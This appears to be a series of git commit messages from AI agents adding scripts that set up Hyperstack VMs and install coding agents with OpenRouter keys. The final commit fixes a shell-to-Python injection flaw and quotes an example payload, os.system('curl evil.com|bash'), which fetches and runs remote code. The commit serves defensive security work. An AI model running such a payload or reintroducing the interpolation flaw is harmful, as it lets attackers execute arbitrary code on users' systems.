Implement hyperstack/opencode.sh script that provisions a Hyperstack VM
and installs OpenCode with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implements Amazon Q CLI on Hyperstack cloud provider. Uses Hyperstack's
VM provisioning API with SSH connectivity. Script installs Amazon Q CLI
via curl|bash, injects OpenRouter credentials as environment variables,
and launches interactive Q chat session.
OpenRouter integration via OPENAI_BASE_URL override pointing to
openrouter.ai/api/v1.
Agent: gap-filler-hyperstack-1
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement gptme agent on Hyperstack cloud platform.
- Install via pip/pip3
- Native OpenRouter support via OPENROUTER_API_KEY
- Launch with -m openrouter/${MODEL_ID} flag
- Uses Hyperstack VM provisioning and SSH primitives
- OAuth flow for API key (port 5181)
Agent: gap-filler-hyperstack-3
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).
Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
